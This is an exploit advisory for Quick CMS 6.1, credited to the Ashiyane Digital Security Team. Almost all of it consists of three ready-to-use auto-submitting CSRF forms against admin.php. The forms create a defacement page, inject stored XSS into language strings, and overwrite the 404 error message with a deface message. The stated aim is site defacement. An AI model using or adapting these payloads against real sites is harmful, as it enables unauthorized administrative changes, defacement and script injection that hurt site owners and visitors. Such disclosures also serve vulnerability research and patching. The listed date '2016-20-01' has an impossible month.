-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit Title : Quick CMS CSRF/XSS
-# Vendor Homepage: http://opensolution.org
-# Software Link:
-# http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip
-# Version : 6.1
-# Date: 2016-20-01
-# Tested On : Windows 7 / FireFox
-# Discovered by : Amir.ght
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit For Create a Deface Page
-# [Text] Is Your Deface Message
-# Path Of page is : http://target.com/?(X)
-# Exploit Code:
<form name="addpage" method="POST"
action="http://[URL]/admin.php?p=pages-form" />
<input type="hidden" name="sName" value="Title Of Page" />
<input type="hidden" name="sDescriptionFull" value="[Text]" />
<input type="hidden" name="iStatus" value="1" />
<input type="hidden" name="sUrl" value="(X)" />
<input type="hidden" name="iPosition" value="0" />
<input type="hidden" name="iMenu" value="1" />
<input type="hidden" name="iTheme" value="1" />
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('addpage.submit()',1);
</script>
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit for XSS/Csrf :
<form name="xss" method="POST"
action="http://[URL]/admin.php?p=languages&sLangEdit=en" />
<input type="hidden" name="Pages"
value="Pages<script>alert(/xss/)</script>" /> is Your js Code
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('xss.submit()',1);
</script>
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit for Edit Error 404 :
<form name="notfound" method="POST"
action="http://[URL]/admin.php?p=languages&sLangEdit=en" />
<input type="hidden" name="404_error" value="title+of+page" />
<input type="hidden" name="Data_not_found" value="deface+message" />
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('notfound.submit()',1);
</script>
------------------------------------------
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-# Exploit Author : Ashiyane Digital Security Team -#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#